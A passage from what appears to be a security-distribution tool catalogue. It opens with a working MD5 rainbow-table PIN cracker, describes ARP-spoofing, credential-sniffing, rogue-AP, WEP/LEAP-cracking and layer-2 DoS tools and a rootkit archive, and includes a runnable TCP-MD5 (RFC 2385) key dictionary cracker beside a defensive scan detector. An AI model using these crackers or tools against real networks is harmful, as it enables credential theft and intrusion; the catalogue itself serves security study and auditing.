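# time/memory tradeoff against brute force is visible.
ALPHABET, LENGTH = "0123456789", 4
N = len(ALPHABET) ** LENGTH
CHAIN_LEN = 40
STATS = {"md5": 0}


def idx_to_plain(n):
    digits = []
    for _ in range(LENGTH):
        n, r = divmod(n, len(ALPHABET))
        digits.append(ALPHABET[r])
    return "".join(reversed(digits))


def H(plain):
    STATS["md5"] += 1
    return hashlib.md5(plain.encode()).hexdigest()


def R(col, digest):
    """Reduction for column `col`: map a digest back into the keyspace.
    Mixing in the column index keeps two chains that collide in different
    columns from merging, which is the rainbow-table refinement over
    Hellman's single reduction function."""
    return idx_to_plain((int(digest[:12], 16) + col) % N)


def chain(start, chain_len=CHAIN_LEN):
    """Plaintexts p0..p_{t-1} of one chain; the endpoint is R(t-1, H(p_{t-1}))."""
    out, p = [], start
    for col in range(chain_len):
        out.append(p)
        p = R(col, H(p))
    return out


def build_table(starts, chain_len=CHAIN_LEN):
    """endpoint -> start; only these two words per chain are stored."""
    table = {}
    for s in starts:
        p = s
        for col in range(chain_len):
            p = R(col, H(p))
        table.setdefault(p, s)      # on an endpoint collision keep the first chain
    return table


def lookup(table, target, chain_len=CHAIN_LEN):
    """Invert `target` if some stored chain passes through its preimage."""
    for col in range(chain_len - 1, -1, -1):
        p = R(col, target)                       # assume target sat in column `col`
        for j in range(col + 1, chain_len):
            p = R(j, H(p))                       # walk the rest of the chain
        if p in table:                           # candidate; may be a false alarm
            q = table[p]
            for j in range(chain_len):
                if H(q) == target:
                    return q
                q = R(j, H(q))
    return None


def brute_force(target):
    for n in range(N):
        p = idx_to_plain(n)
        if H(p) == target:
            return p
    return None


# Constructed start points: a fixed stride through the keyspace.
STARTS = [idx_to_plain((i * 7919) % N) for i in range(300)]
TABLE = build_table(STARTS)

if __name__ == "__main__":
    target = H(chain(STARTS[0])[7])              # a PIN known to be on a chain
    STATS["md5"] = 0
    print("rainbow:", lookup(TABLE, target), "after", STATS["md5"], "MD5 calls")
    STATS["md5"] = 0
    print("brute:", brute_force(target), "after", STATS["md5"], "MD5 calls")
```

Coverage is probabilistic: chains merge and some plaintexts sit on no chain, which is why real tables are generated with far more chains than keyspace/chain-length and lookups can return None. Salting defeats the approach outright, since a table would have to be rebuilt per salt; that is the difference between the unsalted LM/NTLM/MD5 hashes the patched list covers and salted formats such as crypt(3) variants, bcrypt or scrypt.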
        
Tools/isic-006 0.06
Package Directory: /opt/Operator_Extras/Tools/isic-006


ISIC (and components) is intended to test the integrity of an IP Stack
and its component stacks (TCP, UDP, ICMP et. al.)  It does this by generating
a controlled random packet (controlled randomness...  wacky huh?).  The user can
specify he/she/it [I'm tempted to put 'it' before 'she' :-)] wants a stream of
TCP packets.  He/she/it suspects that the target has weak handling of IP Options
(aka Firewall-1).  So he/she/it does a 'tcpsic -s rand -d firewall -I100'.  And
observes the result.

        
Tools/airsnarf-02 0.2
Package Directory: /opt/Operator_Extras/Tools/airsnarf-02


Airsnarf - A rogue AP setup utility
0.2
The Shmoo Group
http://www.shmoo.com

Airsnarf is a simple rogue wireless access point setup utility designed to 
demonstrate how a rogue AP can steal usernames and passwords from public 
wireless hotspots.  Airsnarf was developed and released to demonstrate an 
inherent vulnerability of public 802.11b hotspots--snarfing usernames and 
passwords by confusing users with DNS and HTTP redirects from a competing AP.

        
Tools/httpscan N/A
Package Directory: /opt/Operator_Extras/Tools/httpscan


This program will try to grab the HTTP HEAD response on the specified
port at the target host, and strip the information down to what's
behind the "Server:" header.

        
Tools/madwifi Beta
Package Directory: /opt/Operator_Extras/Tools/madwifi


This software contains a Linux kernel driver for Atheros-based
Wireless LAN devices.  The driver supports station, AP, adhoc, and
monitor modes of operation.  The Atheros driver depends on a
device-independent implementation of the 802.11 protocols that
originated in the BSD community (NetBSD in particular).  You will
find a small amount of BSD-ish glue code that exists mainly to
minimize diffs with the BSD variants. However, as much as possible
this is "native Linux code" that tries to conform to Linux style
and operation.

The driver functions as a normal network device and uses the Wireless
Extensions API.  As such normal Linux tools can and should be used
with it.  Where the wireless extensions are lacking private ioctls
have been added.

        
Tools/tforce-100 1.0.0
Package Directory: /opt/Operator_Extras/Tools/tforce-100


tForce is an HTTP realm brute forcing utility which utilizes wordlists for
passwords against the Basic Authentication Scheme described in RFC 2068
(section 11.1). There's no limit to the number of tries you can attempt against
an HTTP server, so in fact, if you have good wordlists, it's only a matter of
time unless the victim has chosen a very secure password.

        
Tools/vlan_18 1.8
Package Directory: /opt/Operator_Extras/Tools/vlan_18


802.1Q VLAN implementation for Linux

        
Tools/scanssh-14 1.4
Package Directory: /opt/Operator_Extras/Tools/scanssh-14


Scanssh scans the given addresses and networks for running SSH
servers.  It will query their version number and display the results
in a list.

This program was originally written under OpenBSD as a personal
measurement tool.  However, besides gathering statistics, it's also
useful for other purposes such as ensuring that all machines on your
network run the latest SSH versions, etc...

        
Tools/
smbMITM
2
Package Directory: /opt/Operator_Extras/Tools/smbMITM


This program allows you to recover SMB passwords in the clear from the
network where they should be encrypted.
It is a derivative of the man-in-the-middle attack described in Phrack 60
(article "SMB/CIFS by the Root").

        
Tools/
WepAttack-013
0.1.3
Package Directory: /opt/Operator_Extras/Tools/WepAttack-013


WepAttack is a wireless LAN tool for Linux which guesses WEP keys by an
active dictionary attack. Millions of words can be checked.

        
Tools/
phoenix2
2
Package Directory: /opt/Operator_Extras/Tools/phoenix2


phoenix is a tool that 'shoots' every connection you specify by
sending (spoofed) SYN FIN and RST packets ;>

phoenix2 does the same but spoofs in addition the ethernet header
(the MAC address)

http://teso.scene.at/

        
Tools/
irpas-010
0.10
Package Directory: /opt/Operator_Extras/Tools/irpas-010


The IRPAS program collection can be used to perform routing protocol attacks.
Often, the approach is to redirect a traffic stream through another router
which is under the control of an attacker.
Existing systems can be used to do this since most operating systems provide
routing capabilities. But what if such a system is not available? Or the
attacker got a system to reroute its traffic through another one, just to
discover that the new router immediately sends back an ICMP redirect to correct
the routing?


Content:	* dhcpx
			Dynamic Host Confusion Program
			Requests all available IP addresses from a DHCP server
			(still a first implementation - might be a bit alpha)
		* icmp_redirect
			Dynamic redirection: redirects communication using
			network/netmask matches for targeted attacks
		* dfkaa
			"Devices formerly known as Ascend" hacking tool
			(still a little undocumented - give it a try)
		* file2cable
			raw Ethernet frame sender
		* itrace
			traceroute using ICMP echo-request
		* tctrace
			traceroute using TCP SYN packets
		* netenum
			target enumeration
		* netmask
			ICMP netmask query
		* protos
			IP protocol scanner
		* cdp
			program for sending Cisco Discovery Protocol messages
		* igrp
			program for sending IGRP routing updates
		* irdp
			program for sending IRDP ICMP messages
		* irdpresponder
			sends responses to IRDP solicitation messages
		* hsrp
			Hot Standby Router Protocol takeover tool
		* ass
			autonomous system scanner
			- IGRP
			- IRDP
			- EIGRP
			- RIPv1
			- RIPv2
			- CDP
			- HSRP
			- OSPF
        
Tools/
whats_on
1.03
Package Directory: /opt/Operator_Extras/Tools/whats_on


whats_on: Port query utility

Simple program that scans a network range for a specific port and reports
each host on which that port is open.

        
Tools/
cdpr-220
2.2.0
Package Directory: /opt/Operator_Extras/Tools/cdpr-220


cdpr will show which switch and port a machine is connected to, and
optionally decode a complete CDP advertisement. Version 2.0.0 of cdpr now
supports transmitting the decoded data to a server.

As of this release cdpr also supports the ARM processor. cdpr has now
been compiled and tested on Linux (x86), FreeBSD (x86), Sun Solaris (SPARC),
HP-UX (PA-RISC), AIX 4.3.3 (RS6000), Windows NT/2000/XP (x86), and
ARM (Sharp Zaurus SL-5500).
Read README.Win32 for compiling instructions on the Win32 architecture.

        
Tools/
ADMnbtscan
0.1
Package Directory: /opt/Operator_Extras/Tools/ADMnbtscan


ADM-nbtscan
        ADM-nbtscan v0.1 by J. Barber
        Simple script that uses ADM-smb and nbtscan to produce a summary
        listing of accessible smb shares.

        
Tools/
aphunter
N/A
Package Directory: /opt/Operator_Extras/Tools/aphunter


Access Point Hunter. It finds and automatically connects to whatever
wireless network is within range. It can also be used for site surveys,
writing the results to a file.
        
Tools/
sambascan2-034
0.3.4
Package Directory: /opt/Operator_Extras/Tools/sambascan2-034


Sambascan2 allows you to search an entire network or a number of hosts for 
SMB shares. It will also list the contents of all public shares that it 
finds. The difference between sambascan2 and other SMB viewers and scanners 
is that it will search everything using TCP/IP, and it will not send a lot of
broadcast messages, so it can be used over LAN boundaries. It only uses SMB 
to list the shares and their contents.  
        
Tools/
wardrive-23
2.3
Package Directory: /opt/Operator_Extras/Tools/wardrive-23


This tool is for mapping your city for WaveLAN (802.11) networks with a GPS
device while you are driving a car.
It saves found links to a file together with the corresponding GPS position.

There are other scripts available as well:
	* perl scripts from Peter Shipley, which are for FreeBSD
	  http://www.dis.org/wl/
	* perl scripts from Frisco, which are for OpenBSD
	  http://blackant.net/other/wireless.php
So what was needed is an effective tool for Linux. Here it is.
Other nice resources to visit are www.wardriving.com and
www.personaltelco.net/index.cgi/WarDriving

        
Tools/
ophcrack-20
2.0
Package Directory: /opt/Operator_Extras/Tools/ophcrack-20


OPHCRACK 2.0 (Time-Memory-Trade-Off-Crack)

A Windows password cracker based on the faster time-memory trade-off using
rainbow tables.

This is an evolution of the original ophcrack 1.0 developed at EPFL
(http://lasecwww.epfl.ch/~oechslin/projects/ophcrack)

Ophcrack 2.0 comes with a GTK graphical user interface which runs on Windows
as well as on Linux.

The tables used by ophcrack are not compatible with the ones generated
by another tool called rainbowcrack. The tables of ophcrack are much
more compact and, since memory can be traded for time, allow for much
faster cracking of passwords.

Download the ophcrack rainbow tables from:
http://lasecwww.epfl.ch/SSTIC04-10k.zip
or http://lasecwww.epfl.ch/SSTIC04-5k.zip

These tables cover alphanumeric LM hashes. Accounts whose password is stored
only as an NT hash (LM hash storage disabled, or a password longer than 14
characters) are not recoverable with them.

        
Tools/
smbtool-10
1.0
Package Directory: /opt/Operator_Extras/Tools/smbtool-10



smbtool consists of two programs, nbview and nbreg

NetBIOS Viewer (nbview) is a program to check NetBIOS information of
workstations in your network.

Features
- Resolve a NetBIOS name to an IP address
- Resolve an IP address to a NetBIOS name
- Show the logged-in user of the workstation
- See what kind of workstation/server the NetBIOS name belongs to
- See if the NetBIOS name is a unique name


NetBIOS Registrar (nbreg) is a small program with which you can register and
release NetBIOS names. This program can be useful to give Linux/BSD machines a
NetBIOS name.

You need to have a WINS server on your network to make this work!

        
Tools/
cdpsniffer
N/A
Package Directory: /opt/Operator_Extras/Tools/cdpsniffer


CDPsniffer is a small, Perl-only Cisco Discovery Protocol (CDP) decoding
sniffer. It sniffs the network traffic, picks out the CDP packets and prints
the decoded protocol contents.

http://www.remote-exploit.org/codes.html
        
Tools/
areset
0.1
Package Directory: /opt/Operator_Extras/Tools/areset


  ARESETTER is a simple program to reset network connections.
  It works by sniffing the network traffic for three-way-handshakes
  and by constructing TCP packets with the RST flag and the right
  sequence number.

        
Tools/
icmptunnel-013
0.1.3
Package Directory: /opt/Operator_Extras/Tools/icmptunnel-013


icmptunnel encapsulates data in ICMP packets. The usual mode of operation is
TCP/IP forwarding: one icmptunnel is set up on a blocked machine (behind
a firewall) listening on TCP port X. The other icmptunnel is set up
on a non-blocked machine (somewhere on the internet) connected to a local
service (such as port 23, telnet). Data received on the blocked machine's
TCP socket is encapsulated in an ICMP packet of the user's choice
(ICMP_ECHO, ICMP_ECHOREPLY, ICMP_TIMESTAMP, etc.) and sent to the non-blocked
machine. This machine identifies the packet as encapsulated data,
decapsulates it and forwards it on to its TCP socket connected to the
telnet daemon. The telnet daemon responds with some data, icmptunnel on the
non-blocked machine encapsulates the reply and sends it back to the blocked
machine (ICMP type still user definable).

        
Tools/
arp0c2
0c2
Package Directory: /opt/Operator_Extras/Tools/arp0c2


ARP0c is a connection interceptor (using ARP spoofing and a bridging engine).
ARP requests from various sources in a switched environment get false ARP
response packets which point to the host running ARP0c. Packets from these
hosts are bridged with an internal engine to the real destination address to
allow normal network operation and keep TCP connections alive. Packets to
hosts in remote (read: reachable using a router) subnets are forwarded to a
gateway using an internal routing table, independent of the host's routing
table.

When using ARP0c, ARP requests (which are normally sent to all hosts) are
answered both by the real host and by your ARP0c server. After the initial
response, ARP0c continues to send out ARP response packets to keep the target
host 'informed'. This causes most systems to discard the right answer and
believe ARP0c.
Now packets to HOST1 are sent to the Ethernet address of ARP0c. It takes care
of the layer 2 forwarding (bridging) to finally deliver the packets to the
right recipient, because we don't want the connection to break.

        
Tools/
asleap
1.0
Package Directory: /opt/Operator_Extras/Tools/asleap


This tool is released as a proof-of-concept to demonstrate a weakness in the
LEAP protocol.  LEAP is the Lightweight Extensible Authentication Protocol,
intellectual property of Cisco Systems, Inc.  LEAP is a security mechanism
available only on Cisco access points to perform authentication of end-users
and access points.  LEAP is written as a standard EAP type, but is not compliant
with the 802.1X specification since the access point modifies packets in
transit, instead of simply passing them to an authentication server (e.g.
RADIUS).  The weakness asleap exploits is LEAP's use of an MS-CHAPv1-style
challenge/response: the response is derived from the unsalted NT hash of the
user's password, so a captured challenge/response pair can be attacked offline
with a dictionary.

        
Tools/
nmbscan-124
1.2.4
Package Directory: /opt/Operator_Extras/Tools/nmbscan-124


nmbscan scans the shares of a SMB/NetBIOS network, using the NMB/SMB/NetBIOS 
protocols. It is useful for acquiring information on a local area network 
for such purposes as security auditing.

It can obtain such information as NMB/SMB/NetBIOS/Windows hostname, IP 
address, IP hostname, ethernet MAC address, Windows username, 
NMB/SMB/NetBIOS/Windows domain name, and master browser.

It can discover all the NMB/SMB/NetBIOS/Windows hosts on a local area network 
by using the hosts lists maintained by master browsers. 
        
Tools/
deceit
N/A
Package Directory: /opt/Operator_Extras/Tools/deceit


   deceit.c by Aleph One
  
   This program implements enough of the PPTP protocol to steal the
   password hashes of users that connect to it by asking them to change
   their password via the MS-CHAP password change protocol version 1.

        
Tools/
arpsucker
N/A
Package Directory: /opt/Operator_Extras/Tools/arpsucker


The ArpSucker is a patch to arping from iputils:
This patch allows you to poison the ARP cache of the target machine. You
can add all the IP addresses you want to impersonate in the ARP cache of the
other machines, and essentially all packets to those addresses will be
redirected to you. With ip_forward turned on, the packets will be forwarded on
to the intended destination.

        
Tools/
juggernaut_12
1.2
Package Directory: /opt/Operator_Extras/Tools/juggernaut_12


Juggernaut is a robust network tool for the Linux OS.  It contains several
modules offering a wide degree of functionality.  Juggernaut has been tested
successfully on several different Linux machines on several different networks.
However, your mileage may vary depending on the network topology of the
environment (i.e. smart hubbing will kill much of the packet sniffing
functionality...) and, to a lesser extent, the machine running Juggernaut.
If something doesn't work, use a network debugger and figure out why...

Juggernaut v1.0 was originally published in Phrack Magazine, issue 50; on
April 2, 1997.

        
Tools/
ttt-13r
1.3r
Package Directory: /opt/Operator_Extras/Tools/ttt-13r


TCP Testing Tool (ttt)
----------------------

ttt is a tool that can generate TCP segments with arbitrary values for
any field in the IP or TCP headers. A TCP payload can be added to the
segment by specifying the file with the payload in the command line (-P
option) or by passing the payload via standard input (piping the output
of another command to ttt.)

        
Tools/
nast-020
0.2.0
Package Directory: /opt/Operator_Extras/Tools/nast-020


Nast is a packet sniffer and a LAN analyzer based on Libnet and Libpcap. It
can sniff the packets on a network interface in normal mode or in promiscuous
mode.
As an analysis tool, it can check for other NICs on the network which are set
in promiscuous mode, build a list of all hosts on a LAN, find a gateway,
perform port scanning on multiple hosts, catch daemon banners, follow a
TCP data stream, reset a connection, and determine whether a link type is a
hub or switch.
        
Tools/
hotspotter-03
0.3
Package Directory: /opt/Operator_Extras/Tools/hotspotter-03


Hotspotter passively monitors the network for probe request frames to identify 
the preferred networks of Windows XP clients, and will compare it to a 
supplied list of common hotspot network names. If the probed network name 
matches a common hotspot name, Hotspotter will act as an access point to 
allow the client to authenticate and associate. Once associated, Hotspotter 
can be configured to run a command, possibly a script to kick off a DHCP 
daemon and other scanning against the new victim.
        
Tools/
nsat-15
1.5
Package Directory: /opt/Operator_Extras/Tools/nsat-15


NSAT is a fast, stable bulk security scanner designed to audit remote network
services and check for versions, security problems, gather information about
the servers and the machine and much more. Unlike many other auditing tools,
it can collect information about services independently of vulnerabilities,
which makes it "timeless", meaning it doesn't depend on frequent updates as new
vulnerabilities are found.

        
Tools/
aimsniff-09d
0.9d
Package Directory: /opt/Operator_Extras/Tools/aimsniff-09d


AIM Sniff is a utility for monitoring and archiving AOL Instant Messenger 
messages across a network.  You can either do a live dump (actively sniff the 
network) or read a PCAP file and parse the file for IM messages.  You also have
the option of dumping the information to a MySQL database or STDOUT. 

http://www.aimsniff.com
        
Tools/
vlan-testing
N/A
Package Directory: /opt/Operator_Extras/Tools/vlan-testing


VLAN security sample programs. These programs are from Steve A. Rouiller's GIAC
security paper "Virtual LAN Security: weaknesses and countermeasures".
Files:
    VLAN Security.pdf  pvlan  vlan-DE-1-2  vlan-SE-1  vtp-down  vtp-up
        
Tools/
nbtstat
N/A
Package Directory: /opt/Operator_Extras/Tools/nbtstat


This is a small utility that does the equivalent of NT's nbtstat -A against
the host specified on the command line.
It sends a NetBIOS Node Status request to that host and waits (up to 10
seconds) for the reply. If it gets the reply, it dumps the reply as hex, and
then interprets the name table.
        
Tools/
iplog-223
2.2.3
Package Directory: /opt/Operator_Extras/Tools/iplog-223


iplog is a TCP/IP traffic logger.  Currently, it is capable of logging 
TCP, UDP and ICMP traffic.  Adding support for other protocols
should be relatively easy.

iplog's capabilities include the ability to detect TCP port
scans, TCP null scans, FIN scans, UDP and ICMP "smurf" attacks,
bogus TCP flags (used by scanners to detect the operating system in use), 
TCP SYN scans, TCP "Xmas" scans, ICMP ping floods, UDP scans, and IP
fragment attacks.

iplog is able to run in promiscuous mode and monitor traffic to all hosts
on a network.
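
The scan-detection checks listed above, as an added example that is not part
of the Operator listing or of iplog itself: the following Python classifies
the NULL, FIN, Xmas and bogus-flag probes by their TCP flag bits and keeps a
per-source sliding window of SYNs to distinct ports to flag a port scan. The
packet list is constructed, and the flag constants, threshold, window and alert
wording are this example's own choices, not iplog's.

```python
from collections import defaultdict, deque
from typing import Deque, Dict, List, Optional, Set, Tuple

# TCP flag bits (RFC 793 layout of the 13th header byte)
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20


def classify_flags(flags: int) -> str:
    """Name the probe type implied by a TCP flag combination.

    NULL, FIN and Xmas probes never occur in a legitimate session; SYN+FIN
    and SYN+RST are illegal combinations that OS-fingerprinting scanners
    send to see how a stack reacts.
    """
    if flags == 0:
        return "null scan"
    if flags == FIN:
        return "fin scan"
    if flags == FIN | PSH | URG:
        return "xmas scan"
    if flags & SYN and flags & (FIN | RST):
        return "bogus flags"
    if flags == SYN:
        return "syn"
    return "normal"


class ScanDetector:
    """Per-source sliding window over SYNs to distinct destination ports."""

    def __init__(self, threshold: int = 10, window: float = 5.0) -> None:
        self.threshold = threshold
        self.window = window
        self._syns: Dict[str, Deque[Tuple[float, int]]] = defaultdict(deque)
        self._alerted: Set[str] = set()   # one port-scan alert per source

    def observe(self, ts: float, src: str, dst: str, dport: int,
                flags: int) -> Optional[str]:
        kind = classify_flags(flags)
        if kind in ("null scan", "fin scan", "xmas scan", "bogus flags"):
            return f"{kind} from {src} to {dst}:{dport}"
        if kind == "syn":
            q = self._syns[src]
            q.append((ts, dport))
            while q and ts - q[0][0] > self.window:   # expire old SYNs
                q.popleft()
            ports = {p for _, p in q}
            if len(ports) >= self.threshold and src not in self._alerted:
                self._alerted.add(src)
                return f"port scan from {src}: {len(ports)} ports in {self.window:g}s"
        return None


def run(packets) -> List[str]:
    """Feed (ts, src, dst, dport, flags) tuples through one detector."""
    det = ScanDetector()
    return [a for a in (det.observe(*p) for p in packets) if a]


# Constructed traffic: a normal HTTPS client, a SYN sweep of 12 ports, then
# NULL and Xmas probes from a third host.
SAMPLE_PACKETS = (
    [(0.0, "10.0.0.7", "10.0.0.20", 443, SYN),
     (0.1, "10.0.0.7", "10.0.0.20", 443, PSH | ACK)]
    + [(1.0 + i * 0.05, "10.0.0.5", "10.0.0.20", 20 + i, SYN) for i in range(12)]
    + [(3.0, "10.0.0.9", "10.0.0.20", 22, 0),
       (3.1, "10.0.0.9", "10.0.0.20", 22, FIN | PSH | URG)]
)

if __name__ == "__main__":
    for alert in run(SAMPLE_PACKETS):
        print(alert)
```

The flag checks are stateless and fire on a single packet; the port-scan check
is the only one that needs state, and the window keeps that state bounded per
source. A stealthier sweep slower than threshold/window SYNs per second slips
through, which is exactly the trade-off the threshold sets.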

        
Tools/
yersinia-056
0.5.6
Package Directory: /opt/Operator_Extras/Tools/yersinia-056


      yersinia is a framework for performing layer 2 attacks. The following
      protocols have been implemented in the current Yersinia version: Spanning
      Tree Protocol (STP), VLAN Trunking Protocol (VTP), Hot Standby Router
      Protocol (HSRP), Dynamic Trunking Protocol (DTP), IEEE 802.1Q, Cisco
      Discovery Protocol (CDP) and finally the Dynamic Host Configuration
      Protocol (DHCP).

      Some of the attacks implemented will cause a DoS in a network, others
      will help to perform other, more advanced attacks, or both. In addition,
      some of them are released to the public here for the first time, since
      there is no other public implementation.

        
Tools/
captive-115
1.1.5
Package Directory: /opt/Operator_Extras/Tools/captive-115


The first full read/write free access to NTFS disk drives. You can mount
your Microsoft Windows NT, 200x or XP partition as a transparently accessible
volume under GNU/Linux.

To mount an NTFS filesystem:

mkdir /mnt/dosc
mount -t captive-ntfs /dev/hda1 /mnt/dosc
        
Tools/
thc-leapcracker-01
0.1
Package Directory: /opt/Operator_Extras/Tools/thc-leapcracker-01


The THC LEAP Cracker tool suite contains tools to break the NT challenge/response
encryption technique as used, for example, by Cisco wireless LEAP authentication.
Tools for spoofing challenge packets from access points are also included, so
you are able to perform dictionary attacks against all users.
        
Tools/
fakeap-031
0.3.1
Package Directory: /opt/Operator_Extras/Tools/fakeap-031


Using features of the Host AP Driver for Intersil Prism2/2.5/3 
(http://hostap.epitest.fi), Fake AP rapidly generates 802.11b beacon
frames with random ESSID, BSSID (MAC), and channel assignments.  Wardriving
tools like Kismet or NetStumbler will see thousands of APs pop up on their
screens.  While more knowledgeable individuals will spot these fake APs 
for what they are, those with less clue will be generally befuddled and 
great comedy will ensue.  Fake AP can be used on its own, as part of a
wireless honeypot, or form a component of an 802.11b security architecture.  

        
Tools/
naptha-11
1.1
Package Directory: /opt/Operator_Extras/Tools/naptha-11


1) bogusarp - make a bogus entry in the router's ARP cache so it actually
puts packets with our faked source address on the Ethernet. This is done
by sending an ARP query from the MAC & IP we want cached every 6.5 seconds.
This is an inelegant hack, and may be replaced in a future version with a
client that actually listens for requests for its IP address and responds
appropriately. Requires the listening Ethernet interface (eth0,
ne3, ...) to be specified on the command line.

2) synsend - a general purpose program that sends a SYN from a host &
port to another host (or network) and port. Used to send the initial SYN
to the victim.

3) srvr - this replaces the ackfin program in naptha 1.0. On the command
line, one specifies the flags to be listened for in upper case. These are
indicated by the first letter of the flag. The flags to be set in the
response packet are the same letters, but in lower case. Flags may be
specified in any order. The functionality of the ackfin program is
obtained by using the flags -SAaf with srvr.

        
Tools/
ftester-09
0.9
Package Directory: /opt/Operator_Extras/Tools/ftester-09


The Firewall Tester (ftester for friends) is a tool designed for testing
firewall filtering policies; from version 0.6 it also includes an Intrusion
Detection System (IDS) testing feature. Basically ftester is made of a
packet generator (ftest) and a sniffer (ftestd): the first script injects
custom packets carrying a signature in the data part, while the sniffer
listens for such marked packets. Comparing the sniffer's logs with the
injector's identifies the firewall's filtering rules.
Unlike common firewall testing tools or packet generators, ftester is
capable of generating network traffic that will look like real connections
to the firewall or IDS under test, which allows it to test stateful
inspection firewalls (like netfilter or ipfilter) and IDS (like snort).
Another advantage of this architecture is that the crafted packets' source
address can be spoofed, since the sniffer knows which packets are generated
by its counterpart; some tricks involving TTL permit spoofing even when
simulating real connections, which is described as the 'connection
spoofing mode'.

The ftester components are Perl scripts, so they can be executed on any
platform with a recent version of Perl (at least 5.6.1 is recommended)
and the three Perl modules Net::RawIP, Net::PcapUtils and NetPacket, which
can be downloaded from www.cpan.org or installed using the CPAN shell.

 - ftest (the client-side packet generator)
 - ftestd (the sniffer)
 - ftest.conf (ftest example configuration file)
 - freport (a script for comparing ftest and ftestd log files)

        
Tools/
sock_v101
1.01
Package Directory: /opt/Operator_Extras/Tools/sock_v101


Sock is a simple tool for manually attacking web-enabled applications. It 
allows a single HTTP request to be manipulated and re-issued repeatedly from 
the same window. Each response can be viewed as plain text or rendered as a 
web page, and can be searched for keywords. Sock supports SSL, and keeps a 
history of all requests and responses.

Sock provides a convenient graphical context in which to execute the kind of 
manual application testing that can be performed from a command line using 
tools such as netcat and stunnel. In addition, sock automatically handles 
various encodings of server responses, including chunked transfer-encoding 
and compressed content-encoding.

        
Tools/
bgpcrack-21
2.1
Package Directory: /opt/Operator_Extras/Tools/bgpcrack-21


bgpcrack tries to guess, by brute force, the key used to create the
MD5 hash of a TCP segment as described in RFC2385. Network packets are
stored in a file in pcap format, and the dictionary of words to use in
the brute-force attempt is a text file that contains one password per
line.

The "bgp" in "bgpcrack" is historical: bgpcrack does not have anything
to do with BGP - it just tries to guess the password used to generate a
TCP signature of _any_ TCP segment, not just those that are part of a
BGP conversation.
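
What bgpcrack computes for every candidate word, as an added example that is
not bgpcrack's own code: the RFC 2385 digest is MD5 over the TCP pseudo-header,
the fixed 20-byte TCP header with its checksum zeroed, the segment data and
finally the key, and it is compared against the 16-byte digest carried in TCP
option 19. The signed KEEPALIVE segment, the addresses and the wordlist below
are constructed here; reading segments out of a pcap (with dpkt, scapy or a
hand-written parser) is assumed and not shown.

```python
import hashlib
import socket
import struct
from typing import Iterable, Optional

TCP_PROTO = 6
OPT_MD5SIG = 19          # TCP MD5 Signature option kind (RFC 2385)
OPT_MD5SIG_LEN = 18      # kind + length + 16-byte digest


def tcp_md5_digest(src_ip: str, dst_ip: str, segment: bytes, key: bytes) -> bytes:
    """RFC 2385 digest: pseudo-header, fixed header (checksum = 0), data, key.

    `segment` is the whole TCP segment (header, options, data). Options are
    excluded from the digest, which is what lets the sender fill in the
    signature option after computing it.
    """
    doff = (segment[12] >> 4) * 4
    pseudo = (socket.inet_aton(src_ip) + socket.inet_aton(dst_ip)
              + struct.pack("!BBH", 0, TCP_PROTO, len(segment)))
    fixed = segment[:16] + b"\x00\x00" + segment[18:20]   # zero the checksum
    return hashlib.md5(pseudo + fixed + segment[doff:] + key).digest()


def extract_signature(segment: bytes) -> Optional[bytes]:
    """Walk the TCP options and return the digest of option 19, if present."""
    doff = (segment[12] >> 4) * 4
    opts = segment[20:doff]
    i = 0
    while i < len(opts):
        kind = opts[i]
        if kind == 0:                   # End of option list
            break
        if kind == 1:                   # NOP: single byte
            i += 1
            continue
        if i + 1 >= len(opts) or opts[i + 1] < 2:
            break                       # truncated or malformed option
        length = opts[i + 1]
        if kind == OPT_MD5SIG and length == OPT_MD5SIG_LEN:
            return bytes(opts[i + 2:i + OPT_MD5SIG_LEN])
        i += length
    return None


def crack(src_ip: str, dst_ip: str, segment: bytes,
          wordlist: Iterable[str]) -> Optional[str]:
    """Return the first word whose digest matches the segment's signature."""
    sig = extract_signature(segment)
    if sig is None:
        raise ValueError("segment carries no TCP MD5 signature option")
    for word in wordlist:
        word = word.rstrip("\r\n")      # wordlist may come straight from a file
        if tcp_md5_digest(src_ip, dst_ip, segment, word.encode()) == sig:
            return word
    return None


def build_signed_segment(src_ip: str, dst_ip: str, sport: int, dport: int,
                         seq: int, ack: int, flags: int, payload: bytes,
                         key: bytes) -> bytes:
    """Construct a signed segment the way a router would (checksum left 0)."""
    doff = (20 + OPT_MD5SIG_LEN + 2) // 4            # 20 bytes of options
    header = struct.pack("!HHIIBBHHH", sport, dport, seq, ack,
                         doff << 4, flags, 65535, 0, 0)
    # the digest does not cover options, so sign with placeholder options
    digest = tcp_md5_digest(src_ip, dst_ip, header + b"\x00" * 20 + payload, key)
    options = bytes([OPT_MD5SIG, OPT_MD5SIG_LEN]) + digest + b"\x01\x01"  # NOP pad
    return header + options + payload


# Constructed sample: a BGP KEEPALIVE (16 marker bytes, length 19, type 4)
# from 192.0.2.1:179 to 192.0.2.2:35000, signed with the key "s3cret".
SRC, DST = "192.0.2.1", "192.0.2.2"
KEEPALIVE = b"\xff" * 16 + b"\x00\x13\x04"
SAMPLE = build_signed_segment(SRC, DST, 179, 35000, 1000, 2000, 0x18, KEEPALIVE, b"s3cret")
WORDLIST = ["password", "cisco", "bgp", "s3cret", "admin"]

if __name__ == "__main__":
    print("recovered key:", crack(SRC, DST, SAMPLE, WORDLIST))
```

Because the addresses, ports, sequence numbers and payload are all inside the
digest, one captured segment is enough to test a candidate key offline, and
the only thing standing between an attacker with a capture and the key is the
dictionary; `crack` accepts any iterable of strings, so an open file handle
over a wordlist works as-is.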

        
Tools/
tcptraceroute-14
1.4
Package Directory: /opt/Operator_Extras/Tools/tcptraceroute-14


A traceroute implementation using TCP packets

        
Tools/
proxychains-21
2.1
Package Directory: /opt/Operator_Extras/Tools/proxychains-21


This program allows you to use SSH, TELNET, VNC, FTP and any other Internet 
application from behind HTTP(HTTPS) and SOCKS(4/5) proxy servers. This 
"proxifier" provides proxy server support to any app.

        
Tools/
dnstracer-16
1.6
Package Directory: /opt/Operator_Extras/Tools/dnstracer-16


Dnstracer determines where a given Domain Name Server (DNS) gets
its information from, and follows the chain of DNS servers back to
the servers which know the data.

Its behaviour is similar to ntptrace(8), which does the same for the
NTP protocol.

        
Tools/
WifiScanner-095
0.9.5
Package Directory: /opt/Operator_Extras/Tools/WifiScanner-095


WifiScanner is a tool that has been designed to discover wireless nodes
(i.e. access points and wireless clients).
It works with Cisco cards and Prism cards with the hostap driver or wlan-ng driver.
        
Tools/
rootkits
N/A
Package Directory: /opt/Operator_Extras/Tools/rootkits


Miscellaneous collection of rootkits.

Files:

DevNull-rootkit-v0.9.tar.bz2
